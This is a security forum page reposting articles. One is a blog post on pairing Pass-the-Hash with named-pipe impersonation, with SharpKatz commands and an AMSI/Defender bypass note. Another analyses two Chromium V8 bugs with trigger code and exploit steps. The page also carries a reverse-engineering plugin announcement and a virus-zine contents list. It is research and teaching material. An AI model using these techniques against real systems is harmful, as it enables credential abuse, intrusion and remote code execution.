needed to access a system with a specific user such as the CEO, HR-accounts, SAP-administrators or others The tool has to be used on a fully compromised system without another for example linux box under control in the network, so that it can be used as C2-module for example The Tweet above therefore inspired me, to again search for existing tools/techniques. There are plenty of tools for network authentication via Pass-the-Hash. Most of them have the primary goal of code execution on remote systems - which needs a privileged users Hash. Some of those are: SMB (CrackMapExec, smbexec.py, Invoke-SMBExec.ps1) WMI (Invoke-WMIExec.ps1, wmiexec.py) DCOM (dcomexec.py) WinRM (evil-winrm) If we want to have access to an administrative account and a shell for that account, we can easily use the WMI, DCOM and WinRM PTH-tools, as commands are executed in the users context. The python tools could be executed over a SOCKS tunnel via C2 for example, the Powershell scripts work out-of-the-box locally. SMB PTH tools execute commands as nt-authority\system, so user impersonation is not possible here. One of my personal goals was not fulfilled - the impersonation of low privileged accounts. So I had to search for more possibilities. The best results for local PTH actions are in my opinion indeed Mimikatz’s sekurlsa::pth and Rubeus’s PTT features. I tested them again to start software via PTH or inject a Kerberos ticket into existing processes and realized, that they only provide network authentication for the PTH-user. Network authentication Only? Ok, I have to admit, in the most cases network authentication is enough. You can read/write the Active Directory via LDAP, access network shares via SMB, execute code on remote systems with a privileged user (SMB, WMI, DCOM, WinRM) and so on. But still - the edge case to start an application as the other user via Pass-the-Hash is not possible. I thought to myself, that it might be possible to modify one of those tools to archieve the specific goal of an interactive shell. To do that, I had to first dig into the code to understand it. Modifying Rubeus was no opion for me, because PTT uses a Kerberos ticket, which is as far as I know only used for network authentication. That won’t help us authenticating on the localhost for a shell. So I took a look at the Mimikatz feature in the next step. Mimikatz’s sekurlsa::pth feature This part will only give some background information to the sekurlsa::pth Mimikatz module. If you already know about it feel free to skip. Searching for sekurlsa::pth internals resulted in two good blog posts for me, which I recommend reading for a deeper look into the topic, as I will only explain the high-level process: https://www.praetorian.com/blog/inside-mimikatz-part1/ https://www.praetorian.com/blog/inside-mimikatz-part2/ A really short high-level overview of the process is as follows: MSV1_0 and Kerberos are Windows two Authentication providers, which handle authentication using provided credential material The LSASS process on a Windows Operating System contains a structure with MSV1_0 and Kerberos credential material Mimikatz sekurlsa::pth creates a new process with a dummy password for the PTH user. The process is first created in the SUSPENDED state Afterwards it creates a new MSV and Kerberos structure with the user provided NTLM hash and overwrites the original structure for the given user The newly created process is RESUMED, so that the specified binary like for example cmd.exe is executed This part is copy & paste from the part II blog: Overwriting these structures does not change the security information or user information for the local user account. The credentials stored in LSASS are associated with the logon session used for network authentication and not for identifying the local user account associated with a process. Those of you, who read my other blog posts know, that C/C++ is not my favorite language. Therefore I decided to work with @b4rtik’s SharpKatz code, which is a C# port of the in my opinion most important and most used Mimikatz functions. Normally, I don’t like blog posts explaining a topic with code. Don’t ask me why, but this time I did it myself here. The PTH module first creates a structure for the credential material called data from the class SEKURLSA_PTH_DATA: The NtlmHash of this new structure is filled with our given Hash: if (!string.IsNullOrEmpty(rc4)) ntlmHashbytes = Utility.StringToByteArray(rc4); if (!string.IsNullOrEmpty(ntlmHash)) ntlmHashbytes = Utility.StringToByteArray(ntlmHash); if (ntlmHashbytes.Length != Msv1.LM_NTLM_HASH_LENGTH) throw new System.ArgumentException(); data.NtlmHash = ntlmHashbytes; A new process in the SUSPENDED state is opened. Note, that our PTH username is chosen with an empty password: PROCESS_INFORMATION pi = new PROCESS_INFORMATION(); if(CreateProcessWithLogonW(user, "", domain, @"C:\Windows\System32\", binary, arguments, CreationFlags.CREATE_SUSPENDED, ref pi)) In the next step, the process is opened and the LogonID of the new process is copied into our credential material object, which is related to our PTH username. Afterwards, the function Pth_luid is called. This function first searches for and afterwards overwrites the MSV1.0 and Kerberos credential material with our newly created structure: If that resulted in success, the process is resumed via NtResumeProcess. Named Pipe Impersonation Thinking about alternative ways for PTH user Impersonation I asked @EthicalChaos about my approach/ideas and the use-case. Brainstorming with you is always a pleasure, thanks for that! Some ideas for the use-case were: NTLM challenge response locally via InitializeSecurityContext / AcceptSecurityContext Impersonation via process token Impersonation via named pipe identity Impersonation via RPC Identity I excluded the first one, because I simply had no idea about that and never worked with it before. Impersonation via process token or RPC Identity required an existing process for the target user to steal the token from. A process for the target user doesn’t exist in my szenario, so only Named Pipe Impersonation was left. And I thought cool, I already worked with that to build a script to get a SYSTEM shell - NamedPipeSystem.ps1. So I’m not completely lost in the topic and know what it is about. For everyone out there, who doesn’t know about Named Pipe Impersonation I can recommend the following blog post by @decoder_it: https://decoder.cloud/2019/03/06/windows-named-pipes-impersonation/ Again, I will give a short high-level overview for it. Named Pipes are ment to be used for asynchronous or synchronous communication between processes. It’s possible to send or receive data via Named Pipes locally or over the network. Named Pipes on a Windows Operating System are accessible over the IPC$ network share. One Windows API call, namely ImpersonateNamedPipeClient() allows the server to impersonate any client connecting to it. The only thing you need for that is the SeImpersonatePrivilege privilege. Local administrators and many service-accounts have this privilege by default. So opening up a Named Pipe with this privileges enables us to Impersonate any user connecting to that Pipe via ImpersonateNamedPipeClient() and open a new process with the token of that user-account. My first thought about Named Pipe Impersonation in combination with PTH was, that I could spawn a new cmd.exe process via Mimikatz or SharpKatz Pass-the-Hash and connect to the Named Pipe over IPC$ in the new process. If the network credentials are used for that, we would be able to fulfill all our goals for a new tool. So I opened up a new Powershell process via PTH and SharpKatz with the following command: .\SharpKatz.exe --Command pth --User testing --Domain iPad --NtlmHash 7C53CFA5EA7D0F9B3B968AA0FB51A3F5 --Binary "\WindowsPowerShell\v1.0\powershell.exe" What happens in the background? That is explained above. To test, that we are really using the credentials for the user testing we can connect to a linux boxes SMBServer: smbserver.py -ip 192.168.126.131 -smb2support testshare /mnt/share After opening up the server we can connect to it via simply echoing into the share: And voila, the authentication as testing came in, so this definitely works: @decoder_it’s wrote a Powershell script - pipeserverimpersonate.ps1 - which let’s us easily open up a Named Pipe Server for user Impersonation and to open cmd.exe afterwards with the token of the connecting user. The next step for me was to test, if connections from this new process connect to the Named Pipe Server with the network credentials. It turned out, that this unfortunately is not the case: I tried to access the Pipe via 127.0.0.1, Hostname, External IP, but the same result in every case: I also tried using a NamedPipeClient via Powershell - maybe this would result in network authentication with the user testing - still no success: At this point I had no clue on how I could trigger network authentication to localhost for the Named Pipe access. So I gave up on Mimikatz and SharpKatz - but still learned something by doing that. And maybe some of you also learned something in this section. This was a dead end for me. But what happens exactly when network authentication is triggered? To check that, I monitored the network interface for SMB access from one Windows System to another one: The TCP/IP Three-way-handshake is done (SYN,SYN/ACK,ACK) Two Negotiate Protocol Requests and Responses Session Setup Request, NTLMSSP_NEGOTIATE + NTLMSSP_AUTH Tree Connect Request to IPC$ Create Request File testpipe During my tool research I took a look at @kevin_robertson’s Invoke-SMBExec.ps1 code and found, that this script contains exactly the same packets and sends them manually. So by modifying this script, it could be possible to skip the Windows default behaviour and just send exactly those packets manually. This would simulate a remote system authenticating to our Pipe with the user testing. I went through the SMB documentation for some hours, but that did not help me much to be honest. But than I had the idea to just monitor the default Invoke-SMBExec.ps1 traffic for the testing user. Here is the result: Comparing those two packet captures results in only one very small difference. Invoke-SMBExec.ps1 tries to access the Named Pipe svcctl. We can easily change that in line 1562 and 2248 for the CreateRequest and CreateAndXRequest stage, by using different hex values for another Pipe name. So if we only change those bytes to the following, a CreateRequest request is send to our attacker controlled Named Pipe: $SMB_named_pipe_bytes = 0x74,0x00,0x65,0x00,0x73,0x00,0x74,0x00,0x70,0x00,0x69,0x00,0x70,0x00,0x65,0x00 # \testpipe The result is an local authentication to the Named Pipe as the user testing: To get rid of the error message and the resulting timeout we have to do some further changes to the Invoke-SMBExec code. I therefore modified the script, so that after the CreateRequest a CloseRequest, TreeDisconnect and Logoff packet is send instead of the default code execution stuff for Service creation and so on. I also removed all Inveigh Session stuff, parameters and so on. But there still was one more thing to fix. I got the following error from cmd.exe when impersonating the user testing via network authentication: This error didn’t pop up, when a cmd.exe was opened with the password, accessing the Pipe afterwards. Googling this error results in many many crap answers ranging from corrupted filesystem, try to repair it to install DirectX 11 or Disable Antivirus. I decided to ask the community via Twitter and got a fast response from @tiraniddo, that the error code is likely due to not being able to open the Window Station. A solution for that is changing the WinSta/Desktop DACL to grant everyone access. I would have never figured this out, so thank you for that! @decoder_it also send a link to RoguePotato, especially the code for setting correct WinSta/Desktop permissions is included there. Modifying RoguePotato & building one script as PoC Taking a look at the Desktop.cpp code from RoguePotato I decided pretty fast, that porting this code to Powershell or C# is no good idea for me as I would need way too much time for that. So my idea was, to modify the RoguePotato code to get a PipeServer which sets correct permissions for WinSta/Desktop. Doing this was straight forward as I mostly had to remove code. So I removed the RogueOxidResolver components, the IStorageTrigger and so on. The result is the PipeServerImpersonate code. Testing the server in combination with our modified Invoke-SMBExec script resulted in no shell at first. The CreateProcessAsUserW function did not open up the desired binary even though the token had SE_ASSIGN_PRIMARY_NAME privileges. I ended up using CreateProcessWithTokenW with CREATE_NEW_CONSOLE as dwCreationFlags, which worked perfectly fine. Opening up the Named Pipe via modified RoguePotato and connecting to it via Invoke-NamedPipePTH.ps1 resulted in successfull Pass-the-Hash to a Named Pipe for Impersonation and binary execution with the new token: Still - this is not a perfect solution. Dropping PipeServerImpersonate to disk and executing the script in another session is one option, but a single script doing everything is much better in my opinion. Therefore I build a single script, which leverages Invoke-ReflectivePEInjection.ps1 to execute PipeServerImpersonate from memory. This is done in the background via Start-Job, so that Invoke-NamedPipePTH can connect to the Pipe afterwards. It’s possible to specify a custom Pipe Name and binary for execution: This enables us to use it from a C2-Server as module. You could also specify a C2-Stager as binary, so that you will get a new agent with the credentials of the PTH user. Further ideas & improvements I see my code still as PoC, because it is far away from being OPSEC safe and I didn’t test that much possible use-cases. Using Syscalls for PipeServerImpersonate and PE-Injection instead of Windows API functions would further improve this for example. For those of you looking for a C# solution: Sharp-SMBExec is a C# port of Invoke-SMBExec which can be modified the same way I did here to get a C# version for the PTH to the Named Pipe part. However, the PipeServerImpersonate part should also be ported, which in my opinion is more work todo. The whole project gave me the idea, that it would be really cool to also add an option to impacket’s ntlmrelayx.py to relay connections to a Named Pipe. Imagine you compromised a single host in a customer environment and this single host didn’t gave any valuable credentials but has SMB Signing disabled. Modifying PipeServerImpersonate, so that the Named Pipe is not closed but re-opened again after executing a binary would make it possible to get a C2-Stager for every single incoming NetNTLMV2 connection. This means raining shells. The connections only need to be relayed to \\targetserver\IPC$\pipename to get a shell or C2-connection. Conclusion This is the first time, that I created somehow a new technique. At least I didn’t see anyone else using a combination of PTH and Named Pipe Impersonation with the same goal. For me, this was a pretty exciting experience and I learned a lot again. I hope, that you also learned something from that or at least can use the resulting tool in some engagements whenever you are stuck in a situation described above. The script/tool is released with this post, and feedback is as always very welcome! https://github.com/S3cur3Th1sSh1t/NamedPipePTH 20.04.2021: Update I’m pretty sure, that I before publication of the tool tested the content of Start-Job Scriptblocks for AMSI scans/blocks. And it was not scanned neither blocked. After the publication, Microsoft obviously decided to activate this feature, because the standalone script didn’t work anymore with Defender enabled even after patching AMSI.dll in memory for the process: Therefore, I decided to switch from the native Start-Job function to the Start-ThreadJob function, which again bypasses Defender because its executed in the same process: If this description is true, Start-Job should have scanned and blocked scripts before because it’s another process. But here we stay in the same process, therefore a bypass works: Links & Resources Crackmapexec - https://github.com/byt3bl33d3r/CrackMapExec Impacket - https://github.com/SecureAuthCorp/impacket/ Invoke-TheHash - https://github.com/Kevin-Robertson/Invoke-TheHash/ evil-winrm - https://github.com/Hackplayers/evil-winrm mimikatz - https://github.com/gentilkiwi/mimikatz Rubeus - https://github.com/GhostPack/Rubeus Inside Mimikatz part I - https://www.praetorian.com/blog/inside-mimikatz-part1/ Inside Mimikatz part II - https://www.praetorian.com/blog/inside-mimikatz-part2/ SharpKatz - https://github.com/b4rtik/SharpKatz/ NamedPipeSystem - https://github.com/S3cur3Th1sSh1t/Get-System-Techniques/blob/master/NamedPipe/NamedPipeSystem.ps1 Windows Named Pipes Impersonation - https://decoder.cloud/2019/03/06/windows-named-pipes-impersonation/ PipeServerImpersonate.ps1 - https://github.com/decoder-it/pipeserverimpersonate/blob/master/pipeserverimpersonate.ps1 SMB Documentation - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/5606ad47-5ee0-437a-817e-70c366052962 RoguePotato - https://github.com/antonioCoco/RoguePotato Invoke-ReflectivePEInjection - https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1 Sharp-SMBExec - https://github.com/checkymander/Sharp-SMBExec NamedPipePTH - https://github.com/S3cur3Th1sSh1t/NamedPipePTH PSThreadJob - https://github.com/PaulHigin/PSThreadJob Sursa: https://s3cur3th1ssh1t.github.io/Named-Pipe-PTH/
      • 1
      • Upvote
  21. Tenet: A Trace Explorer for Reverse Engineers Conventional Debuggers Are Crumbling to Software Complexity, Now What? April 20, 2021 / Markus Gaasedelen Debugging is traditionally a tedious, monotonous endeavor. While some people love the archaeological process of using a debugger to uncover software defects or perform tasks in software reverse engineering, virtually everyone agrees that the tools have started to show their age against modern software. Our methods of runtime introspection are still hyper-focused on individual states of execution. This is a problem because software has grown dramatically more complex, requiring more context and ‘situational awareness’ to properly interpret. The emergence of timeless debugging has alleviated some of these growing pains, but these solutions are still built around conventional methods of inspecting individual states rather than how they relate to one another. I am open sourcing Tenet, an IDA Pro plugin for exploring execution traces. The goal of this plugin is to provide more natural, human controls for navigating execution traces against a given binary. The basis of this work stems from the desire to research new or innovative methods to examine and distill complex execution patterns in software. Tenet is an experimental plugin for exploring software execution traces in IDA Pro Background Tenet is directly inspired by QIRA. The earliest prototypes I wrote for this date back to 2015 when I was working as a software security engineer at Microsoft. These prototypes were built on top of the private ‘trace reader’ APIs for TTD, previously known as TTT, or iDNA. I abandoned that work because I wasn’t convinced an assembly level trace explorer would make sense at the one company in the world where Windows is called ‘open source software’. I’m revisiting the idea of a trace explorer because it’s 2021 and the space is still wildly undeveloped. Among other ideas, I firmly believe in the notion that there is a geographical landscape to program execution, and that the principles of traditional cartography can be applied to the summarization, illustration, and navigation of these landscapes. As cool as I hope you find the plugin, Tenet is only a stepping stone to further research these ideas. Usage Tenet can be downloaded or cloned from GitHub. It requires IDA 7.5 and Python 3. Once properly installed, there will be a new menu entry available in the disassembler. This can be used to load externally-collected execution traces into Tenet. Tenet adds a menu entry to the IDA --> Load file submenu to load execution traces As this is the initial release, Tenet only accepts simple human-readable text traces. Please refer to the tracing readme for additional information on the trace format, limitations, and reference tracers. Bidirectional Exploration While using Tenet, the plugin will ‘paint’ trails to indicate the flow of execution forwards (blue) and backwards (red) from your present position in the active execution trace. Tenet provides locality to past and present execution flow while navigating the trace To step forwards or backwards through time, you simply scroll while hovering over the timeline on the right side of the disassembler. To step over function calls, hold SHIFT while scrolling. Trace Timeline The trace timeline will be docked on the right side of the disassembler. This widget is used to visualize different types of events along the trace timeline and perform basic navigation as described above. The trace timeline is a key component to navigating Tenet traces and focusing on areas of interest By clicking and dragging across the timeline, it is possible to zoom in on a specific section of the execution trace. This action can be repeated any number of times to reach the desired granularity. Execution Breakpoints Clicking the instruction pointer in the registers window will highlight it in red, revealing all the locations the instruction was executed across the trace timeline. Placing a breakpoint on the current instruction and navigating between its executions by scrolling To jump between executions, scroll up or down while hovering the highlighted instruction pointer. Additionally, you can right click in the disassembly listing and select one of the navigation-based menu entries to quickly seek to the execution of an instruction of interest. Using a Tenet navigation shortcut to seek the trace to the first execution of the given instruction IDA’s native F2 hotkey can also be used to set breakpoints on arbitrary instructions. Memory Breakpoints By clicking a byte in either the stack or memory views, you will instantly see all reads/writes to that address visualized across the trace timeline. Yellow indicates a memory read, blue indicates a memory write. Seeking the trace across states of execution, based on accesses to a selected byte of memory Memory breakpoints can be navigated using the same technique described for execution breakpoints. Click a byte, and scroll while hovering the selected byte to seek the trace to each of its accesses. Right clicking a byte of interest will give you options to seek between memory read / write / access if there is a specific navigation action that you have in mind. Tenet provides a number of navigation shortcuts for memory accesses To navigate the memory view to an arbitrary address, click onto the memory view and hit G to enter either an address or database symbol to seek the view to. Region Breakpoints A rather experimental feature is setting access breakpoints for a region of memory. This is possible by highlighting a block of memory, and selecting the Find accesses action from the right click menu. Tenet allows you to set a memory access breakpoint over a region of memory, and navigate between its accesses As with normal memory breakpoints, hovering the region and scrolling can used to traverse between the accesses made to the selected region of memory. Register Seeking In reverse engineering, it’s pretty common to encounter situations where you ask yourself “Which instruction set this register to its current value?” Using Tenet, you can seek backwards to that instruction in a single click. Seeking to the timestamp responsible for setting a register of interest Seeking backwards is by far the most common direction to navigate across register changes… but for dexterity you can also seek forward to the next register assignment using the blue arrow on the right of the register. Timestamp Shell A simple ‘shell’ is provided to navigate to specific timestamps in the trace. Pasting (or typing…) a timestamp into the shell with or without commas will suffice. The 'timestamp shell' can be used to navigate the trace reader to a specific timestamp Using an exclamation point, you can also seek a specified ‘percentage’ into the trace. Entering !100 will seek to the final instruction in the trace, where !50 will seek approximately 50% of the way through the trace. Themes Tenet ships with two default themes – a ‘light’ theme, and a ‘dark’ one. Depending on the colors currently used by your disassembler, Tenet will attempt to select the theme that seems most appropriate. Tenet has both light, and dark themes that will be selected based on the user's disassembly theme The theme files are stored as simple JSON on disk and are highly configurable. If you are not happy with the default themes or colors, you can create your own themes and simply drop them in the user theme directory. Tenet will remember your theme preference for future loads and uses. Open Source Tenet is currently an unfunded research project. It is available for free on GitHub, published under the MIT license. In the public README, there is additional information on how to get started, future ideas, and even an FAQ that have not been covered in this post. Without funding, the time I can devote to this project is limited. If your organization is excited by the ideas put forth here and capable of providing capital to sponsor dedicated development time towards Tenet, please contact us. Related Works There aren’t many robust projects (or products) in this space, and it’s important to raise awareness for the few that exist. If you found this blogpost interesting, please consider exploring and supporting more of these technologies: QIRA – QEMU Interactive Runtime Analyser Microsoft TTD – Time Travel Debugging for Windows RR // Pernosco – Timeless debugging for Linux PANDA – Full system tracing, built on QEMU REVEN – Full system tracing, built on PANDA / VirtualBox UndoDB – Reversible debugging for Linux and Android DejaVM – :^) Conclusion In this post, we presented a new IDA Pro plugin called Tenet. It is an experimental plugin designed to explore software execution traces. It can be used both as an aid in the reverse engineering process, and a research technology to explore new ideas in program analysis, visualization, and the efficacy of next generation debugging experiences. Our experience developing for these technologies is second to none. RET2 is happy to consult in these spaces, providing plugin development services, the addition of custom features to existing works, or other unique opportunities with regard to security tooling. If your organization has a need for this expertise, please feel free to reach out. Sursa: https://blog.ret2.io/2021/04/20/tenet-trace-explorer/
  22. Analysis of Chromium issue 1196683, 1195777 Apr 20, 2021 • iamelli0t On April 12, a code commit[1] in Chromium get people’s attention. This is a bugfix for some vulnerability in Chromium Javascript engine v8. At the same time, the regression test case regress-1196683.js for this bugfix was also submitted. Based on this regression test case, some security researcher published an exploit sample[2]. Due to Chrome release pipeline, the vulnerability wasn’t been fixed in Chrome stable update until April 13[3]. Coincidentally, on April 15, another code commit[4] of some bugfix in v8 has also included one regression test case regress-1195777.js. Based on this test case, the exploit sample was exposed again[5]. Since the latest Chrome stable version does not pull this bugfix commit, the sample can still exploit in render process of latest Chrome. When the vulnerable Chormium browser accesses a malicious link without enabling the sandbox (–no-sandbox), the vulnerability will be triggered and caused remote code execution. RCA of Issue 1196683 The bugfix for this issue is shown as follows: This commit fixes the issue of incorrect instruction selection for the ChangeInt32ToInt64 node in the instruction selection phase of v8 TurboFan. Before the commit, instruction selection is according to the input node type of the ChangeInt32ToInt64 node. If the input node type is a signed integer, it selects the instruction X64Movsxlq for sign extension, otherwise it selects X64Movl for zero extension. After the bugfix, X64Movsxlq will be selected for sign extension regardless of the input node type. First, let’s analyze the root cause of this vulnerability via regress-1196683.js: (function() { const arr = new Uint32Array([2**31]); function foo() { return (arr[0] ^ 0) + 1; } %PrepareFunctionForOptimization(foo); assertEquals(-(2**31) + 1, foo()); %OptimizeFunctionOnNextCall(foo); assertEquals(-(2**31) + 1, foo()); }); The foo function that triggers JIT has only one code line. Let’s focus on the optimization process of (arr[0] ^ 0) + 1 in the key phases of TurboFan: 1) TyperPhase The XOR operator corresponds to node 32, and its two inputs are the constant 0 (node 24) and arr[0] (node 80). 2) SimplifiedLoweringPhase The original node 32: SpeculativeNumberBitwiseXor is optimized to Word32Xor, and the successor node ChangeInt32ToInt64 is added after Word32Xor. At this time, the input node (Word32Xor) type of ChangeInt32ToInt64 is Signed32. 3) EarlyOptimizationPhase We can see that the original node 32 (Word32Xor) has been deleted and replaced with node 80 as the input of the node 110 ChangeInt32ToInt64. Now the input node (LoadTypedElement) type of ChangeInt32ToInt64 is Unsigned32. The v8 code corresponding to the logic is as follows: template <typename WordNAdapter> Reduction MachineOperatorReducer::ReduceWordNXor(Node* node) { using A = WordNAdapter; A a(this); typename A::IntNBinopMatcher m(node); if (m.right().Is(0)) return Replace(m.left().node()); // x ^ 0 => x if (m.IsFoldable()) { // K ^ K => K (K stands for arbitrary constants) return a.ReplaceIntN(m.left().ResolvedValue() ^ m.right().ResolvedValue()); } if (m.LeftEqualsRight()) return ReplaceInt32(0); // x ^ x => 0 if (A::IsWordNXor(m.left()) && m.right().Is(-1)) { typename A::IntNBinopMatcher mleft(m.left().node()); if (mleft.right().Is(-1)) { // (x ^ -1) ^ -1 => x return Replace(mleft.left().node()); } } return a.TryMatchWordNRor(node); } As the code shown above, for the case of x ^ 0 => x, the left node is used to replace the current node, which introduces the wrong data type. 4) InstructionSelectionPhase According to the previous analysis, in instruction selection phase, because the input node (LoadTypedElement) type of ChangeInt32ToInt64 is Unsigned32, the X64Movl instruction is selected to replace the ChangeInt32ToInt64 node finally: Because the zero extended instruction X64Movl is selected incorrectly, (arr[0] ^ 0) returns the wrong value: 0x0000000080000000. Finally, using this vulnerability, a variable x with an unexpected value 1 in JIT can be obtained via the following code (the expected value should be 0): const _arr = new Uint32Array([0x80000000]); function foo() { var x = (_arr[0] ^ 0) + 1; x = Math.abs(x); x -= 0x7fffffff; x = Math.max(x, 0); x -= 1; if(x==-1) x = 0; return x; } RCA of Issue 1195777 The bugfix for this issue is shown as follows: This commit fixes a integer conversion node generation error which used to convert a 64-bit integer to a 32-bit integer (truncation) in SimplifiedLowering phase. Before the commit, if the output type of current node is Signed32 or Unsigned32, the TruncateInt64ToInt32 node is generated. After the commit, if the output type of current node is Unsigned32, the type of use_info is needed to be checked next. Only when use_info.type_check() == TypeCheckKind::kNone, the TruncateInt64ToInt32 node wiill be generated. First, let’s analyze the root cause of this vulnerability via regress-1195777.js: (function() { function foo(b) { let x = -1; if (b) x = 0xFFFFFFFF; return -1 < Math.max(0, x, -1); } assertTrue(foo(true)); %PrepareFunctionForOptimization(foo); assertTrue(foo(false)); %OptimizeFunctionOnNextCall(foo); assertTrue(foo(true)); })(); The key code in foo function which triggers JIT is ‘return -1 < Math.max(0, x, -1)’. Let’s focus on the optimization process of Math.max(0, x, -1) in the key phases of TurboFan: 1) TyperPhase Math.max(0, x, -1) corresponds to node 56 and node 58. The output of node 58 is used as the input of node 41: SpeculativeNumberLessThan (<) . 2) TypedLoweringPhase The two constant parameters 0, -1 (node 54 and node 55) in Math.max(0, x, -1) are replaced with constant node 32 and node 14. 3) SimplifiedLoweringPhase The original NumberMax node 56 and node 58 are replaced by Int64LessThan + Select nodes. The original node 41: SpeculativeNumberLessThan is replaced with Int32LessThan. When processing the input node of SpeculativeNumberLessThan, because the output type of the input node (Select) is Unsigned32, the vulnerability is triggered and the node 76: TruncateInt64ToInt32 is generated incorrectly. The result of Math.max(0, x, -1) is truncated to Signed32. Therefore, when the x in Math.max(0, x, -1) is Unsigned32, it will be truncated to Signed32 by TruncateInt64ToInt32. Finally, using this vulnerability, a variable x with an unexpected value 1 in JIT can be obtained via the following code (the expected value should be 0): function foo(flag){ let x = -1; if (flag){ x = 0xFFFFFFFF; } x = Math.sign(0 - Math.max(0, x, -1)); return x; } Exploit analysis According to the above root cause analysis, we can see that the two vulnerabilities are triggered when TurboFan performs integer data type conversion (expansion, truncation). Using the two vulnerabilities, a variable x with an unexpected value 1 in JIT can be obtained. According to the samples exploited in the wild, the exploit is following the steps below: 1) Create an Array which length is 1 with the help of variable x which has the error value 1; 2) Obtain an out-of-bounds array with length 0xFFFFFFFF through Array.prototype.shift(); The key code is as shown follows: var arr = new Array(x); // wrong: x = 1 arr.shift(); // oob var cor = [1.8010758439469018e-226, 4.6672617056762661e-62, 1.1945305861211498e+103]; return [arr, cor]; The JIT code of var arr = new Array(x) is: Rdi is the length of arr, which value is 1. It shift left one bit (rdi+rdi) by pointer compression and stored in JSArray.length property (+0xC). The JIT code of arr.shift() is: After arr.shift(), the length of arr is assigned by constant 0xFFFFFFFE directly, the optimization process is shown as follows: (1)TyperPhase The array length assignment operation is mainly composed of node 152 and node 153. The node 152 caculates Array.length-1. The node 153 saves the calculation result in Array.length (+0xC). (2)LoadEliminationPhase Since the value of x which collected by Ignition is 0, constant folding (0-1=-1) happens here to get the constant 0xFFFFFFFF. After shift left one bit, it is 0xFFFFFFFE, which is stored in Array.length (+0xC). Thus, an out-of-bounds array with a length of 0xFFFFFFFF is obtained. After the out-of-bounds array is obtained, the next steps are common: 3) Realize addrof/fakeobj with the help of this out-of-bounds array; 4) Fake a JSArray to achieve arbitrary memory read/write primitive wth the help of addrof/fakeobj; The memory layout of arr and cor in exploit sample is: (1) Use the vulnerability to obtain an arr with the length of 0xFFFFFFFF (red box) (2) Use the out-of-bounds arr and cor to achieve addrof/fakeobj (green box) (3) Use the out-of-bounds arr to modify the length of cor (yellow box) (4) Use the out-of-bounds cor, leak the map and properties of the cor (blue box), fake a JSArray, and use this fake JSArray to achieve arbitrary memory read/write primitive 5) Execute shellcode with the help of WebAssembly; Finally, a memory page with RWX attributes is created with the help of WebAssembly. The shellcode is copied to the memory page, and executed in the end. The exploitation screenshot: References [1] https://chromium-review.googlesource.com/c/v8/v8/+/2820971 [2] https://github.com/r4j0x00/exploits/blob/master/chrome-0day/exploit.js [3] https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop.html [4] https://chromium-review.googlesource.com/c/v8/v8/+/2826114 [5] https://github.com/r4j0x00/exploits/blob/master/chrome-0day/exploit.js Sursa: https://iamelli0t.github.io/2021/04/20/Chromium-Issue-1196683-1195777.html
  23. Nytro

    tmp.0ut

    tmp.0ut Volume 1 - April 2021 │ █ │ │ CONTENTS └───────────────────█ ──┘ │ │ │ 1.0 Intro ....................................................... tmp.0ut Staff │ │ 1.1 Dead Bytes .................................................... xcellerator │ │ 1.2 Implementing the PT_NOTE Infection Method In x64 Assembly ........... sblip │ │ 1.3 PT_NOTE To PT_LOAD ELF Injector In Rust ............................. d3npa │ │ 1.4 PT_NOTE Disinfector In Python .................................... manizzle │ │ 1.5 Fuzzing Radare2 For 0days In About 30 Lines Of Code ..... Architect, s01den │ │ 1.6 The Polymorphic False-Disassembly Technique ........................ s01den │ │ 1.7 Lin64.Eng3ls: Some Anti-RE Techniques In A Linux Virus ...... s01den, sblip │ │ 1.8 Linux.Midrashim.asm ................................................... TMZ │ │ 1.9 In-Memory LKM Loading ........................................... netspooky │ │ 1.10 Linux SHELF Loading .................................... ulexec, Anonymous_ │ │ 1.11 Return To Original Entry Point Despite PIE ......................... s01den │ │ 1.12 Writing Viruses In MIPS Assembly For Fun (And No Profit) ........... s01den │ │ 1.13 Interview: herm1t ........................................... tmp.0ut Staff │ │ 1.14 GONE IN 360 SECONDS - Linux/Retaliation ............................ qkumba │ │ 1.15 Linux.Nasty.asm ....................................................... TMZ │ │ 1.16 Linux.Precinct3.asm ............................................. netspooky │ │ 1.17 Underground Worlds ................................................. s01den │ │ │ └──────────────────────────────────────────────────────────────────────────────────┘ >> For the txt version of this zine, visit https://tmpout.sh/1/txt/index.txt (all .html files are renamed to .txt!) or download the zip of this zine here: https://tmpout.sh/1/tmp.0ut.1.txt.zip Sursa: https://tmpout.sh/1/
      • 1
      • Upvote
×
×
  • Create New...